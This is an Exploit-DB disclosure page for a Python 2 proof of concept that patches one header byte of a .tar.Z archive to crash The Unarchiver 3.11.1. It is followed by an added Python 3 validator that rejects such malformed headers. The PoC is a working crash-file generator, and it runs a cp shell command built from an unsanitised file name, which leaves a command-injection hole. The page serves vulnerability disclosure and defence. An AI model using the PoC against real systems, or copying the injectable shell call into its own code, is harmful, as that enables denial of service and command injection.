The Unarchiver 3.11.1 – ‘.tar.Z’ Crash (PoC)

  • Author: Antonio Z.
    Date: 2016-10-18
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40570/
  • # Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
    # Date: 10-17-2016
    # Exploit Author: Antonio Z.
    # Vendor Homepage: http://unarchiver.c3.cx/unarchiver
    # Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
    # Version: 3.11.1
    # Tested on: OS X 10.10, OS X 10.11, OS X 10.12
    
    # More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
    
    # Python 2 script: copies the input archive and patches one header byte in the copy.
    import os, struct, sys
    from mmap import mmap
    
    if len(sys.argv) <= 1:
        print "Usage: python Local_Crash_PoC.py [file name]"
        exit()
    
    file_name = sys.argv[1]
    file_mod = open(file_name, 'r+b')
    file_hash = file_mod.read()
    
    def get_extension(file_name):
        # Everything after the first dot, e.g. "a.tar.Z" -> ".tar.Z"
        basename = os.path.basename(file_name)
        extension = '.'.join(basename.split('.')[1:])
        return '.' + extension if extension else None
    
    def file_maping():
        # Overwrite the byte at offset 2 (third byte of the .Z header) with 0xFF
        maping = mmap(file_mod.fileno(),0)
        maping.seek(2)
        maping.write_byte(struct.pack('B', 255))
        maping.close()
    
    new_file_name = "Local_Crash_PoC" + get_extension(file_name)
    
    # Work on a copy so the original archive is left untouched
    os.popen('cp ' + file_name + ' ' + new_file_name)
    file_mod = open(new_file_name, 'r+b')
    file_maping()
    file_mod.close()
    print '[+] ' + 'Created file: ' + new_file_name
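
The script's only modification is writing 0xFF at offset 2, which in the `.Z` header described by the linked lzw.h is the flags byte (`BIT_MASK` 0x1f for the maximum code width, `BLOCK_MODE` 0x80, `LZW_RESERVED` 0x60). The following is an added example, not part of the original PoC or of The Unarchiver's code: a Python 3 header check that a decompressor or triage script can run before decoding to reject such a file. The name `check_z_header`, the sample bytes, and the policy of rejecting reserved bits and widths below `INIT_BITS` are assumptions of this example; the page does not state the application's actual root cause.

```python
import struct

# Constants as defined in gzip's lzw.h (the header the PoC comments link to).
LZW_MAGIC = b"\x1f\x9d"
BIT_MASK = 0x1F       # low five bits: maximum code width
LZW_RESERVED = 0x60   # reserved bits, expected to be zero
BLOCK_MODE = 0x80     # block-compress flag
INIT_BITS, BITS = 9, 16


def check_z_header(data):
    """Return (ok, reason, fields) for the 3-byte compress(1) header."""
    if len(data) < 3:
        return False, "truncated header", {}
    magic, flags = struct.unpack_from("2sB", data, 0)
    if magic != LZW_MAGIC:
        return False, "not a .Z stream", {}
    fields = {
        "maxbits": flags & BIT_MASK,
        "block_mode": bool(flags & BLOCK_MODE),
        "reserved": flags & LZW_RESERVED,
    }
    # Policy of this example: reject any width outside INIT_BITS..BITS
    # and any reserved bit, instead of trusting the header.
    if not INIT_BITS <= fields["maxbits"] <= BITS:
        reason = "maxbits %d outside %d..%d" % (fields["maxbits"], INIT_BITS, BITS)
        return False, reason, fields
    if fields["reserved"]:
        return False, "reserved flag bits set", fields
    return True, "ok", fields


# Constructed samples: a typical header (16-bit codes, block mode) and the
# same header after a single-byte write of 0xFF at offset 2.
GOOD = b"\x1f\x9d\x90" + b"\x00" * 8
PATCHED = GOOD[:2] + b"\xff" + GOOD[3:]

if __name__ == "__main__":
    for name, blob in (("good", GOOD), ("patched", PATCHED)):
        print(name, check_z_header(blob))
```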